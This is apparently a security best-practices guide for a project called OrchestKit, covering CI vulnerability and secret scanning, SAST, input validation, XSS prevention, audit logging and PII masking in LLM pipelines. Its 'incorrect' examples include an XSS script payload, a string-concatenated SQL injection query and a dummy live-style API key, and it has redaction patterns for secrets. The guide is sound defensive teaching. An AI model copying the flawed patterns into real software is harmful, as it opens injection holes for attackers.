trace = langfuse.trace(
    input="My email is john@example.com and SSN is 123-45-6789"
)
# Stored as: "My email is [REDACTED_EMAIL] and SSN is [REDACTED_SSN]"

Scan dependencies for CVEs, detect committed secrets, and run SAST to catch vulnerabilities before production — CRITICAL

Dependency Scanning

Automate vulnerability detection in package dependencies before deployment.

Incorrect — ignoring audit output:

npm audit  # Runs but nobody checks the result
npm install  # Proceeds regardless of vulnerabilities

Correct — automated scanning with severity gates:

# JavaScript (npm)
npm audit --json > security-audit.json
CRITICAL=$(npm audit --json | jq '.metadata.vulnerabilities.critical')
HIGH=$(npm audit --json | jq '.metadata.vulnerabilities.high')

if [ "$CRITICAL" -gt 0 ] || [ "$HIGH" -gt 0 ]; then
  echo "BLOCK: $CRITICAL critical, $HIGH high vulnerabilities"
  exit 1
fi

# Auto-fix safe updates
npm audit fix
# Python (pip-audit)
pip-audit --format=json > security-audit.json

# Alternative: safety
safety check --json > security-audit.json
# Container images (Trivy)
trivy image myapp:latest --format json > trivy-scan.json
CRITICAL=$(cat trivy-scan.json | jq '[.Results[].Vulnerabilities[]? | select(.Severity == "CRITICAL")] | length')

Escalation thresholds:

SeverityThresholdAction
CriticalAnyBLOCK deployment
High> 5BLOCK deployment
Moderate> 20WARNING
Low> 50WARNING

Key rules:

  • Run npm audit or pip-audit in CI — block on critical/high findings
  • Use --json output for automation (not human-readable format)
  • Container scanning with Trivy catches OS-level vulnerabilities npm/pip miss
  • Auto-fix with npm audit fix only for non-breaking updates; review breaking fixes manually

Secret Detection

Prevent credentials, API keys, and tokens from being committed to repositories.

Incorrect — relying on .gitignore alone:

# .gitignore only prevents file-level commits, not inline secrets
echo "API_KEY=sk-live-abc123" >> config.py
git add config.py  # Secret committed — now in git history forever

Correct — multi-layer secret detection:

# TruffleHog (scans entire git history)
trufflehog git file://. --json > secrets-scan.json

# Gitleaks (fast, pre-commit friendly)
gitleaks detect --source . --report-format json

# Check results
SECRET_COUNT=$(cat secrets-scan.json | jq '. | length')
if [ "$SECRET_COUNT" -gt 0 ]; then
  echo "BLOCK: $SECRET_COUNT secrets detected!"
  exit 1
fi

Pre-commit hooks (most effective layer):

# .pre-commit-config.yaml
repos:
  # Gitleaks — fast pattern matching
  - repo: https://github.com/gitleaks/gitleaks
    rev: v8.18.0
    hooks:
      - id: gitleaks

  # detect-secrets — supports baselines for false positives
  - repo: https://github.com/Yelp/detect-secrets
    rev: v1.4.0
    hooks:
      - id: detect-secrets
        args: ["--baseline", ".secrets.baseline"]

Baseline for false positives:

# Generate baseline (marks existing non-secrets)
detect-secrets scan > .secrets.baseline

# Audit false positives interactively
detect-secrets audit .secrets.baseline

Key rules:

  • Use pre-commit hooks as first line of defense — catches secrets before they enter history
  • TruffleHog for deep history scanning; Gitleaks for fast pre-commit checks
  • If a secret is committed, rotate it immediately — removing from history is not enough
  • Use .secrets.baseline to suppress false positives (e.g., example keys in docs)
  • Run both pre-commit AND CI scanning — defense in depth

Static Analysis (SAST)

Run static application security testing to catch vulnerabilities in source code.

Incorrect — relying only on linters for security:

# ESLint/Pylint catch style issues, not security vulnerabilities
eslint .  # Does not detect SQL injection, SSRF, or path traversal

Correct — dedicated SAST tools:

# Semgrep (multi-language, auto rules include OWASP patterns)
semgrep --config=auto --json > semgrep-results.json
CRITICAL=$(cat semgrep-results.json | jq '[.results[] | select(.extra.severity == "ERROR")] | length')

if [ "$CRITICAL" -gt 0 ]; then
  echo "BLOCK: $CRITICAL critical SAST findings"
  exit 1
fi
# Bandit (Python-specific)
bandit -r . -f json -o bandit-report.json
HIGH=$(cat bandit-report.json | jq '[.results[] | select(.issue_severity == "HIGH")] | length')

Pre-commit integration (shift-left):

# .pre-commit-config.yaml
repos:
  - repo: https://github.com/semgrep/semgrep
    rev: v1.52.0
    hooks:
      - id: semgrep
        args: ["--config", "auto", "--error"]

  - repo: https://github.com/PyCQA/bandit
    rev: 1.7.7
    hooks:
      - id: bandit
        args: ["-c", "pyproject.toml", "-r", "."]
        exclude: ^tests/

CI integration:

# GitHub Actions
- name: SAST scan
  run: |
    semgrep --config=auto --json > sast.json
    ERRORS=$(jq '[.results[] | select(.extra.severity == "ERROR")] | length' sast.json)
    if [ "$ERRORS" -gt 0 ]; then
      echo "::error::$ERRORS critical SAST findings"
      exit 1
    fi

Key rules:

  • Use semgrep --config=auto for broad OWASP coverage across languages
  • Bandit is Python-specific — pair with Semgrep for multi-language projects
  • Run SAST in pre-commit hooks (shift-left) AND CI (enforce)
  • Block on ERROR severity; WARNING findings go to review queue

Validate input with server-side schemas using Zod and Pydantic with allowlist patterns — HIGH

Input Schema Validation

Core Principles

  1. Never trust user input
  2. Validate on server-side (client-side is UX only)
  3. Use allowlists (not blocklists)
  4. Validate type, length, format, range

Zod v4 Schema

import { z } from 'zod';

const UserSchema = z.object({
  email: z.string().email(),
  name: z.string().min(2).max(100),
  age: z.coerce.number().int().min(0).max(150),
  role: z.enum(['user', 'admin']).default('user'),
});

const result = UserSchema.safeParse(req.body);
if (!result.success) {
  return res.status(400).json({ errors: result.error.flatten() });
}

Type Coercion (v4)

// Query params come as strings - coerce to proper types
z.coerce.number()  // "123" -> 123
z.coerce.boolean() // "true" -> true
z.coerce.date()    // "2024-01-01" -> Date

Pydantic (Python)

from pydantic import BaseModel, EmailStr, Field, field_validator

class User(BaseModel):
    email: EmailStr
    name: str = Field(min_length=2, max_length=100)
    age: int = Field(ge=0, le=150)

    @field_validator('name')
    @classmethod
    def strip_and_title(cls, v: str) -> str:
        return v.strip().title()

Express Middleware

function validateBody<T extends z.ZodSchema>(schema: T) {
  return (req: Request, res: Response, next: NextFunction) => {
    const result = schema.safeParse(req.body);
    if (!result.success) {
      return res.status(400).json({
        error: 'Validation failed',
        details: result.error.flatten().fieldErrors,
      });
    }
    req.body = result.data;
    next();
  };
}

app.post('/api/users', validateBody(CreateUserSchema), async (req, res) => {
  const user = req.body;  // fully typed and validated
});

Query Parameter Validation

const PaginationSchema = z.object({
  page: z.coerce.number().int().positive().default(1),
  limit: z.coerce.number().int().min(1).max(100).default(20),
  sort: z.enum(['name', 'email', 'createdAt']).default('createdAt'),
  order: z.enum(['asc', 'desc']).default('desc'),
});

Anti-Patterns

// NEVER rely on client-side validation only
if (formIsValid) submit();  // No server validation

// NEVER use blocklists
const blocked = ['password', 'secret'];  // Easy to miss fields

// NEVER build queries with string concat
"SELECT * FROM users WHERE name = '" + name + "'"  // SQL injection

// ALWAYS validate server-side
const result = schema.safeParse(req.body);

// ALWAYS use allowlists
const allowed = ['name', 'email', 'createdAt'];

// ALWAYS use parameterized queries
db.query('SELECT * FROM users WHERE name = ?', [name]);

Key Decisions

DecisionRecommendation
Validation libraryZod (TS), Pydantic (Python)
StrategyAllowlist over blocklist
LocationServer-side always
Error messagesGeneric (don't leak info)

Incorrect — Trusting client-side validation allows attackers to bypass checks:

// Client-side only
const email = document.getElementById('email').value;
if (email.includes('@')) {
  await fetch('/api/users', { method: 'POST', body: JSON.stringify({ email }) });
}
// Attacker can bypass with curl/Postman

Correct — Server-side schema validation with Zod ensures all input is validated:

app.post('/api/users', validateBody(z.object({
  email: z.string().email(),
})), async (req, res) => {
  // req.body.email is validated regardless of client
});

Validation: Output Encoding & XSS Prevention — HIGH

Output Encoding & XSS Prevention

HTML Sanitization (Python)

from markupsafe import escape

@app.route('/comment', methods=['POST'])
def create_comment():
    content = escape(request.form['content'])
    db.execute("INSERT INTO comments (content) VALUES (?)", [content])

HTML Sanitization (JavaScript)

import DOMPurify from 'dompurify';

// Sanitize HTML input with allowed tags
const sanitizedHtml = DOMPurify.sanitize(userInput, {
  ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a'],
  ALLOWED_ATTR: ['href'],
});

XSS Prevention

Safe — textContent and React auto-escaping:

// SAFE: textContent escapes HTML entities
element.textContent = userInput;

// React is safe by default
<div>{userInput}</div>  // Auto-escaped

Dangerous — innerHTML and dangerouslySetInnerHTML bypass escaping:

// DANGEROUS: innerHTML can execute scripts
element.innerHTML = userInput;  // NEVER do this with user input

// DANGEROUS: bypasses React escaping
<div dangerouslySetInnerHTML={{__html: userInput}} />

Server-Side XSS Prevention (Flask)

from flask import request, render_template_string
from markupsafe import escape

@app.route('/greet')
def greet():
    name = request.args.get('name', '')
    return f"<h1>Hello, {escape(name)}!</h1>"

# Or use Jinja2 templates (auto-escape by default)
@app.route('/greet-template')
def greet_template():
    return render_template_string(
        "<h1>Hello, {{ name }}!</h1>",
        name=request.args.get('name', '')
    )

Security Headers

SECURITY_HEADERS = {
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "X-Content-Type-Options": "nosniff",
    "X-Frame-Options": "DENY",
    "X-XSS-Protection": "1; mode=block",
    "Referrer-Policy": "strict-origin-when-cross-origin",
    "Content-Security-Policy": "default-src 'self'",
}

@app.after_request
def add_security_headers(response):
    for header, value in SECURITY_HEADERS.items():
        response.headers[header] = value
    return response

SRI for CDN Scripts

<script src="https://cdn.example.com/lib.js"
        integrity="sha384-..."
        crossorigin="anonymous"></script>

Anti-Patterns

// NEVER use innerHTML with user input
element.innerHTML = userInput;

// NEVER use dangerouslySetInnerHTML without sanitization
<div dangerouslySetInnerHTML={{__html: userInput}} />

// NEVER trust Content-Type header for file validation
if (file.type === 'image/png') {...}  // Can be spoofed

// ALWAYS use textContent or DOMPurify
element.textContent = userInput;
const safe = DOMPurify.sanitize(userInput);

Incorrect — Using innerHTML with user content allows XSS script injection:

const userComment = "<script>alert('XSS')</script>";
element.innerHTML = userComment;
// Script executes, stealing cookies/tokens

Correct — Using textContent automatically escapes HTML and prevents XSS:

const userComment = "<script>alert('XSS')</script>";
element.textContent = userComment;
// Renders as plain text: "<script>alert('XSS')</script>"

Validation: Advanced Schemas & File Validation — HIGH

Advanced Schemas & File Validation

Discriminated Unions

const NotificationSchema = z.discriminatedUnion('type', [
  z.object({
    type: z.literal('email'),
    email: z.string().email(),
    subject: z.string().min(1),
    body: z.string().min(1),
  }),
  z.object({
    type: z.literal('sms'),
    phone: z.string().regex(/^\+[1-9]\d{1,14}$/),
    message: z.string().max(160),
  }),
  z.object({
    type: z.literal('push'),
    deviceToken: z.string().min(1),
    title: z.string().max(50),
    body: z.string().max(200),
  }),
]);

File Upload Validation

const FileUploadSchema = z.object({
  filename: z.string().min(1).max(255),
  mimeType: z.enum([
    'image/jpeg', 'image/png', 'image/webp', 'application/pdf',
  ]),
  size: z.number().max(10 * 1024 * 1024, 'File must be under 10MB'),
});

// Validate file content (magic bytes)
const imageMagicBytes: Record<string, number[]> = {
  'image/jpeg': [0xFF, 0xD8, 0xFF],
  'image/png': [0x89, 0x50, 0x4E, 0x47],
  'image/webp': [0x52, 0x49, 0x46, 0x46],
  'application/pdf': [0x25, 0x50, 0x44, 0x46],
};

function validateFileContent(buffer: Buffer, mimeType: string): boolean {
  const expected = imageMagicBytes[mimeType];
  if (!expected) return false;
  return expected.every((byte, i) => buffer[i] === byte);
}

URL Validation with Domain Allowlist

const ALLOWED_DOMAINS = ['api.example.com', 'cdn.example.com'] as const;

const SafeUrlSchema = z.string()
  .url()
  .refine(
    (url) => {
      const { hostname, protocol } = new URL(url);
      return protocol === 'https:' &&
        (ALLOWED_DOMAINS as readonly string[]).includes(hostname);
    },
    { message: 'URL must be HTTPS and from allowed domains' }
  );

Form Validation with React Hook Form

import { useForm } from 'react-hook-form';
import { zodResolver } from '@hookform/resolvers/zod';

const SignupSchema = z.object({
  email: z.string().email('Invalid email'),
  password: z.string()
    .min(8, 'Password must be at least 8 characters')
    .regex(/[A-Z]/, 'Must contain uppercase')
    .regex(/[0-9]/, 'Must contain number'),
  confirmPassword: z.string(),
}).refine(data => data.password === data.confirmPassword, {
  message: "Passwords don't match",
  path: ['confirmPassword'],
});

function SignupForm() {
  const { register, handleSubmit, formState: { errors } } = useForm({
    resolver: zodResolver(SignupSchema),
  });

  return (
    <form onSubmit={handleSubmit(onSubmit)}>
      <input {...register('email')} />
      {errors.email && <span>{errors.email.message}</span>}
      <input type="password" {...register('password')} />
      <button type="submit">Sign Up</button>
    </form>
  );
}

Allowlist Pattern

// Only allow specific sort columns
const SortColumnSchema = z.enum(['name', 'email', 'createdAt', 'updatedAt']);

// Dynamic allowlist factory
function createAllowlistSchema<T extends string>(allowed: readonly T[]) {
  return z.enum(allowed as [T, ...T[]]);
}

Python Discriminated Union

from pydantic import BaseModel, EmailStr, Field
from typing import Literal, Union

class EmailNotification(BaseModel):
    type: Literal['email']
    email: EmailStr
    subject: str
    body: str

class SMSNotification(BaseModel):
    type: Literal['sms']
    phone: str
    message: str = Field(max_length=160)

Notification = Union[EmailNotification, SMSNotification]

Key Decisions

DecisionRecommendation
File validationCheck magic bytes, not just extension
URL validationHTTPS + domain allowlist
Polymorphic dataDiscriminated unions
Form validationZod + React Hook Form

Incorrect — Trusting file extension or MIME type allows malicious file uploads:

if (file.name.endsWith('.png') && file.type === 'image/png') {
  await uploadFile(file);  // Can be spoofed by renaming .exe to .png
}

Correct — Validating magic bytes ensures file content matches declared type:

const buffer = await file.arrayBuffer();
const bytes = new Uint8Array(buffer);
const isPNG = bytes[0] === 0x89 && bytes[1] === 0x50 && bytes[2] === 0x4E;
if (isPNG) {
  await uploadFile(file);  // Verified actual PNG file
}

References (15)

Audit Logging

Audit Logging

Purpose

Audit logs answer: Who did What, When, Where, and Why?

They're required for:

  • Security incident investigation
  • Compliance (SOC2, GDPR, HIPAA)
  • Debugging production issues
  • Usage analytics

What to Log

Always Log (Audit Events)

Event TypeWhat to LogExample
AuthenticationSuccess/failure, method"User login via OAuth"
AuthorizationDecision, resource, action"Access granted to analysis_123"
Data AccessRead/write, resource type"Read 10 documents"
Data ModificationBefore/after (hashed), resource"Updated analysis status"
LLM CallsModel, tokens, latency (NOT prompt)"GPT-4, 1500 tokens, 2.3s"
ErrorsType, context (sanitized)"ValidationError on /api/analyze"

Never Log (Sensitive Data)

Data TypeWhy NotAlternative
PasswordsSecurityLog "password changed" event
API KeysSecurityLog key ID, not value
Full PromptsMay contain PIILog prompt hash, token count
LLM ResponsesMay contain generated PIILog response hash, length
User ContentPrivacyLog content hash, length
PIIGDPR/PrivacyLog anonymized or redacted

Implementation

Sanitized Logger

import structlog
import re
import hashlib
from typing import Any

class SanitizedLogger:
    """Logger that automatically redacts sensitive data"""

    REDACT_PATTERNS = {
        r"password": "[PASSWORD_REDACTED]",
        r"api[_-]?key": "[API_KEY_REDACTED]",
        r"secret": "[SECRET_REDACTED]",
        r"token": "[TOKEN_REDACTED]",
        r"authorization": "[AUTH_REDACTED]",
        r"[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}": "[EMAIL_REDACTED]",
    }

    HASH_FIELDS = {"prompt", "response", "content"}

    def __init__(self):
        self._logger = structlog.get_logger()

    def _sanitize(self, data: dict[str, Any]) -> dict[str, Any]:
        """Sanitize sensitive fields"""
        result = {}
        for key, value in data.items():
            # Hash content fields instead of logging
            if key.lower() in self.HASH_FIELDS:
                result[f"{key}_hash"] = hashlib.sha256(
                    str(value).encode()
                ).hexdigest()[:16]
                result[f"{key}_length"] = len(str(value))
                continue

            # Redact sensitive patterns
            str_value = str(value)
            for pattern, replacement in self.REDACT_PATTERNS.items():
                if re.search(pattern, key, re.IGNORECASE):
                    result[key] = replacement
                    break
                str_value = re.sub(pattern, replacement, str_value, flags=re.IGNORECASE)
            else:
                result[key] = str_value

        return result

    def audit(self, event: str, **kwargs):
        """Log an audit event with automatic sanitization"""
        sanitized = self._sanitize(kwargs)
        self._logger.info(
            event,
            audit=True,
            **sanitized,
        )

    def info(self, msg: str, **kwargs):
        self._logger.info(msg, **self._sanitize(kwargs))

    def error(self, msg: str, **kwargs):
        self._logger.error(msg, **self._sanitize(kwargs))

Audit Event Structure

from dataclasses import dataclass
from datetime import datetime
from enum import Enum
from uuid import UUID

class AuditAction(Enum):
    CREATE = "create"
    READ = "read"
    UPDATE = "update"
    DELETE = "delete"
    LOGIN = "login"
    LOGOUT = "logout"
    LLM_CALL = "llm_call"
    SEARCH = "search"

@dataclass
class AuditEvent:
    """Structured audit event"""
    # WHO
    user_id: UUID
    tenant_id: UUID
    session_id: str

    # WHAT
    action: AuditAction
    resource_type: str
    resource_id: UUID | None

    # WHEN
    timestamp: datetime

    # WHERE
    request_id: str
    trace_id: str
    ip_address: str
    user_agent: str

    # OUTCOME
    success: bool
    error_code: str | None = None

    # CONTEXT (sanitized)
    metadata: dict | None = None

Usage in OrchestKit

# Authentication
logger.audit(
    "user.login",
    user_id=user.id,
    tenant_id=user.tenant_id,
    method="oauth",
    success=True,
)

# Data Access
logger.audit(
    "documents.search",
    user_id=ctx.user_id,
    tenant_id=ctx.tenant_id,
    query_hash=hash(query),  # Not the actual query
    result_count=len(results),
    success=True,
)

# LLM Call
logger.audit(
    "llm.generate",
    user_id=ctx.user_id,
    tenant_id=ctx.tenant_id,
    model="gpt-4",
    input_tokens=1500,
    output_tokens=500,
    latency_ms=2300,
    prompt_hash=hash(prompt),  # Not the actual prompt!
    success=True,
)

# Authorization Failure
logger.audit(
    "authorization.denied",
    user_id=ctx.user_id,
    tenant_id=ctx.tenant_id,
    action="analysis:delete",
    resource_id=analysis_id,
    reason="missing permission",
    success=False,
)

Log Retention

EnvironmentRetentionReason
Development7 daysDebugging
Staging30 daysTesting
Production1 yearCompliance
Security Events7 yearsLegal requirements

Integration with Langfuse

from langfuse import Langfuse

langfuse = Langfuse()

# Create trace for observability
trace = langfuse.trace(
    name="analysis",
    user_id=str(ctx.user_id),  # Langfuse supports user tracking
    session_id=ctx.session_id,
    metadata={
        "tenant_id": str(ctx.tenant_id),
        "request_id": ctx.request_id,
    },
)

# Log LLM call
generation = trace.generation(
    name="content_analysis",
    model="gpt-4",
    input=prompt,  # Langfuse handles securely
    output=response,
)

Compliance Considerations

GDPR

  • Log data access but not the data itself
  • Provide audit trail for subject access requests
  • Log data deletion events

SOC2

  • Log all authentication events
  • Log all authorization decisions
  • Log all data modifications
  • Retain logs for audit period

HIPAA

  • Log all access to PHI
  • Log user ID, timestamp, action
  • Never log PHI content in logs

Context Separation

Context Separation Pattern

The Problem

When identifiers appear in LLM prompts, several security issues arise:

┌─────────────────────────────────────────────────────────┐
│  WHAT HAPPENS WHEN IDs GO INTO PROMPTS                  │
├─────────────────────────────────────────────────────────┤
│                                                         │
│  "Analyze document doc_abc123 for user usr_xyz789"      │
│                     │                    │              │
│                     ▼                    ▼              │
│              ┌──────────────────────────────┐           │
│              │           LLM                │           │
│              │                              │           │
│              │  May hallucinate:            │           │
│              │  - doc_abc124 (off by one)   │           │
│              │  - doc_xyz789 (mixed up)     │           │
│              │  - usr_other (cross-tenant)  │           │
│              └──────────────────────────────┘           │
│                                                         │
│  RISKS:                                                 │
│  • Hallucinated IDs don't exist → crashes              │
│  • Mixed IDs → wrong data attribution                  │
│  • Cross-tenant IDs → security breach                  │
│  • IDs in logs/traces → data leakage                   │
│                                                         │
└─────────────────────────────────────────────────────────┘

The Solution: Context Separation

┌─────────────────────────────────────────────────────────┐
│  CORRECT: CONTEXT FLOWS AROUND LLM                      │
├─────────────────────────────────────────────────────────┤
│                                                         │
│  RequestContext ─────────────────────────────────────►  │
│  (user_id, tenant_id, etc.)                    │        │
│         │                                      │        │
│         │   ┌──────────────────────┐          │        │
│         │   │                      │          │        │
│         ▼   │       LLM            │          ▼        │
│  ┌──────────┤                      ├─────────────┐     │
│  │ Content  │  Sees ONLY:          │  Content +  │     │
│  │ (text)   │  - Document text     │  Context    │     │
│  │          │  - Query text        │  (merged)   │     │
│  └──────────┤  - Instructions      ├─────────────┘     │
│             │                      │                    │
│             │  NO IDs!             │                    │
│             └──────────────────────┘                    │
│                                                         │
└─────────────────────────────────────────────────────────┘

Implementation

1. Define What's Forbidden

# OrchestKit parameters that NEVER go in prompts
FORBIDDEN_IN_PROMPTS = {
    # User identity
    "user_id",      # UUID - hallucination risk
    "tenant_id",    # UUID - cross-tenant risk
    "session_id",   # String - auth context

    # Resource references
    "analysis_id",  # UUID - job tracking
    "document_id",  # UUID - source tracking
    "artifact_id",  # UUID - output tracking
    "chunk_id",     # UUID - RAG reference

    # System context
    "trace_id",     # String - observability
    "request_id",   # String - request tracking
    "workflow_run_id",  # UUID - workflow tracking

    # Secrets
    "api_key",      # String - never!
    "token",        # String - never!
}

2. Separate Context from Content

from dataclasses import dataclass
from uuid import UUID

@dataclass
class ContentPayload:
    """What the LLM sees - content only"""
    query: str
    context_texts: list[str]
    instructions: str

@dataclass
class ContextPayload:
    """What flows around the LLM - never in prompt"""
    user_id: UUID
    tenant_id: UUID
    analysis_id: UUID
    source_refs: list[UUID]
    trace_id: str

async def analyze_content(
    content: ContentPayload,
    context: ContextPayload,
) -> AnalysisResult:
    """
    Content goes TO the LLM.
    Context goes AROUND the LLM.
    """
    # Build prompt from content only
    prompt = build_prompt(
        query=content.query,
        context_texts=content.context_texts,
        instructions=content.instructions,
        # NO context payload fields here!
    )

    # LLM sees content only
    llm_output = await llm.generate(prompt)

    # Reattach context to output
    return AnalysisResult(
        content=llm_output,
        user_id=context.user_id,      # From context
        tenant_id=context.tenant_id,   # From context
        analysis_id=context.analysis_id,  # From context
        sources=context.source_refs,   # From context
    )

3. Audit Prompts Before Sending

import re

UUID_PATTERN = r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}'

def audit_prompt(prompt: str) -> list[str]:
    """
    Check for forbidden patterns before sending to LLM.
    Raises if any IDs detected.
    """
    violations = []

    # Check for UUIDs
    if re.search(UUID_PATTERN, prompt, re.IGNORECASE):
        violations.append("UUID detected in prompt")

    # Check for ID field names
    for forbidden in FORBIDDEN_IN_PROMPTS:
        pattern = rf'\b{forbidden}\b'
        if re.search(pattern, prompt, re.IGNORECASE):
            violations.append(f"Forbidden field '{forbidden}' in prompt")

    return violations

# Usage in prompt building
def build_safe_prompt(content: ContentPayload) -> str:
    prompt = f"""
    Analyze the following content:

    {content.query}

    Context:
    {chr(10).join(content.context_texts)}
    """

    # Audit before returning
    violations = audit_prompt(prompt)
    if violations:
        raise PromptSecurityError(
            f"Prompt contains forbidden content: {violations}"
        )

    return prompt

OrchestKit Integration Points

Content Analysis Workflow

# backend/app/workflows/agents/content_analyzer.py

async def analyze(state: AnalysisState) -> AnalysisState:
    # Context is in state, but NOT passed to prompt
    ctx = state.request_context

    # Build content-only payload
    content = ContentPayload(
        query=state.analysis_request.query,
        context_texts=[doc.content for doc in state.retrieved_docs],
        instructions=get_analysis_instructions(),
    )

    # Context payload for attribution
    context = ContextPayload(
        user_id=ctx.user_id,
        tenant_id=ctx.tenant_id,
        analysis_id=state.analysis_id,
        source_refs=[doc.id for doc in state.retrieved_docs],
        trace_id=ctx.trace_id,
    )

    result = await analyze_content(content, context)
    return state.with_result(result)

Common Mistakes

# ❌ BAD: ID in prompt
prompt = f"Analyze document {doc_id} for user {user_id}"

# ❌ BAD: ID in f-string
prompt = f"Context from analysis {analysis_id}:\n{context}"

# ❌ BAD: ID in instruction
prompt = f"You are analyzing for tenant {tenant_id}. Be helpful."

# ✅ GOOD: Content only
prompt = f"Analyze the following document:\n{document_content}"

# ✅ GOOD: No IDs visible
prompt = f"""
Analyze this content and provide insights:

{content}

Relevant context:
{context_texts}
"""

Testing Context Separation

import pytest

class TestContextSeparation:

    def test_prompt_contains_no_uuids(self):
        content = ContentPayload(
            query="What are the key concepts?",
            context_texts=["Machine learning basics..."],
            instructions="Provide clear analysis",
        )

        prompt = build_safe_prompt(content)

        assert not re.search(UUID_PATTERN, prompt)

    def test_prompt_contains_no_forbidden_fields(self):
        content = ContentPayload(...)
        prompt = build_safe_prompt(content)

        for forbidden in FORBIDDEN_IN_PROMPTS:
            assert forbidden not in prompt.lower()

    def test_audit_catches_leaked_uuid(self):
        bad_prompt = "Analyze doc 123e4567-e89b-12d3-a456-426614174000"

        violations = audit_prompt(bad_prompt)

        assert len(violations) > 0
        assert "UUID" in violations[0]

Langfuse Mask Callback

Langfuse Mask Callback

Pre-trace PII masking using Langfuse's mask callback for automatic redaction before data reaches the server.

Basic Setup

from langfuse import Langfuse
import re

PII_PATTERNS = {
    "email": re.compile(r'\b[\w.-]+@[\w.-]+\.\w{2,}\b'),
    "phone": re.compile(r'\b(?:\+1[-.]?)?\(?\d{3}\)?[-.]?\d{3}[-.]?\d{4}\b'),
    "ssn": re.compile(r'\b\d{3}-\d{2}-\d{4}\b'),
}

def mask_pii(data: dict) -> dict:
    """Mask PII in Langfuse trace data before sending."""
    def redact_string(value: str) -> str:
        for entity_type, pattern in PII_PATTERNS.items():
            value = pattern.sub(f'[REDACTED_{entity_type.upper()}]', value)
        return value

    def redact_recursive(obj):
        if isinstance(obj, str):
            return redact_string(obj)
        elif isinstance(obj, dict):
            return {k: redact_recursive(v) for k, v in obj.items()}
        elif isinstance(obj, list):
            return [redact_recursive(item) for item in obj]
        return obj

    return redact_recursive(data)

langfuse = Langfuse(mask=mask_pii)

With Presidio

from presidio_analyzer import AnalyzerEngine
from presidio_anonymizer import AnonymizerEngine

analyzer = AnalyzerEngine()
anonymizer = AnonymizerEngine()

def presidio_mask(data: dict) -> dict:
    """Enterprise-grade PII masking with Presidio."""
    def anonymize_string(value: str) -> str:
        if len(value) < 5:
            return value
        results = analyzer.analyze(text=value, language="en")
        if results:
            return anonymizer.anonymize(text=value, analyzer_results=results).text
        return value

    def process_recursive(obj):
        if isinstance(obj, str):
            return anonymize_string(obj)
        elif isinstance(obj, dict):
            return {k: process_recursive(v) for k, v in obj.items()}
        elif isinstance(obj, list):
            return [process_recursive(item) for item in obj]
        return obj

    return process_recursive(data)

langfuse = Langfuse(mask=presidio_mask)

References

Llm Guard Sanitization

LLM Guard Sanitization

Input/output sanitization for LLM pipelines using LLM Guard's Anonymize and Deanonymize scanners.

Installation

pip install llm-guard
python -m spacy download en_core_web_trf  # High-accuracy model

Basic Input Sanitization

from llm_guard.input_scanners import Anonymize
from llm_guard.input_scanners.anonymize_helpers import BERT_LARGE_NER_CONF
from llm_guard.vault import Vault

# Vault stores original values for deanonymization
vault = Vault()

# Initialize scanner with configuration
scanner = Anonymize(
    vault=vault,
    preamble="",  # Text prepended to sanitized output
    allowed_names=["John Doe"],  # Names to NOT anonymize
    hidden_names=["Acme Corp"],  # Always anonymize these
    recognizer_conf=BERT_LARGE_NER_CONF,
    language="en"
)

def sanitize_input(prompt: str) -> tuple[str, bool, float]:
    """
    Sanitize user input before sending to LLM.

    Returns:
        (sanitized_prompt, is_valid, risk_score)
    """
    sanitized_prompt, is_valid, risk_score = scanner.scan(prompt)
    return sanitized_prompt, is_valid, risk_score

# Usage
prompt = "My name is Jane Smith and my email is jane@company.com"
sanitized, valid, risk = sanitize_input(prompt)
# Result: "My name is [REDACTED_PERSON_1] and my email is [REDACTED_EMAIL_1]"

Output Deanonymization

from llm_guard.output_scanners import Deanonymize

# Use the same vault from input sanitization
deanonymize_scanner = Deanonymize(vault=vault)

def deanonymize_output(sanitized_prompt: str, model_output: str) -> str:
    """
    Restore original values in model output.

    Args:
        sanitized_prompt: The prompt that was sent to the LLM
        model_output: The LLM's response

    Returns:
        Output with original values restored
    """
    restored_output, is_valid, risk_score = deanonymize_scanner.scan(
        sanitized_prompt,
        model_output
    )
    return restored_output

# Example flow
original_prompt = "Schedule a meeting with Jane Smith at jane@company.com"
sanitized_prompt, _, _ = scanner.scan(original_prompt)
# sanitized_prompt = "Schedule a meeting with [PERSON_1] at [EMAIL_1]"

llm_response = await llm.generate(sanitized_prompt)
# llm_response = "Meeting scheduled with [PERSON_1]. Confirmation sent to [EMAIL_1]."

final_response = deanonymize_output(sanitized_prompt, llm_response)
# final_response = "Meeting scheduled with Jane Smith. Confirmation sent to jane@company.com."

Output Sensitive Data Detection

from llm_guard.output_scanners import Sensitive

# Detect PII in LLM outputs (without prior anonymization)
sensitive_scanner = Sensitive(
    entity_types=["PERSON", "EMAIL_ADDRESS", "PHONE_NUMBER", "CREDIT_CARD"],
    redact=True,  # Replace detected PII with [REDACTED]
    threshold=0.5  # Confidence threshold (0-1)
)

def check_output_for_pii(prompt: str, output: str) -> tuple[str, bool, float]:
    """
    Check LLM output for leaked PII.

    Returns:
        (sanitized_output, is_valid, risk_score)
    """
    sanitized_output, is_valid, risk_score = sensitive_scanner.scan(prompt, output)
    return sanitized_output, is_valid, risk_score

Full Pipeline Integration

from llm_guard.input_scanners import Anonymize
from llm_guard.output_scanners import Deanonymize, Sensitive
from llm_guard.vault import Vault
from langfuse import observe, get_client

class SecureLLMPipeline:
    def __init__(self):
        self.vault = Vault()
        self.anonymize = Anonymize(vault=self.vault, language="en")
        self.deanonymize = Deanonymize(vault=self.vault)
        self.sensitive_check = Sensitive(redact=True)

    @observe(name="secure_llm_call")
    async def process(self, user_input: str) -> str:
        """Secure LLM pipeline with full PII protection."""

        # Step 1: Anonymize input
        sanitized_input, input_valid, input_risk = self.anonymize.scan(user_input)

        get_client().update_current_observation(
            metadata={
                "input_risk_score": input_risk,
                "pii_detected_in_input": not input_valid
            }
        )

        # Step 2: Call LLM with sanitized input
        llm_response = await self.llm.generate(sanitized_input)

        # Step 3: Check output for leaked PII
        checked_output, output_valid, output_risk = self.sensitive_check.scan(
            sanitized_input,
            llm_response
        )

        # Step 4: Deanonymize for user (restore original names)
        final_output = self.deanonymize.scan(sanitized_input, checked_output)[0]

        get_client().update_current_observation(
            metadata={
                "output_risk_score": output_risk,
                "pii_leaked_in_output": not output_valid
            }
        )

        return final_output

Configuration Options

Anonymize Scanner

from llm_guard.input_scanners import Anonymize
from llm_guard.input_scanners.anonymize_helpers import (
    BERT_LARGE_NER_CONF,
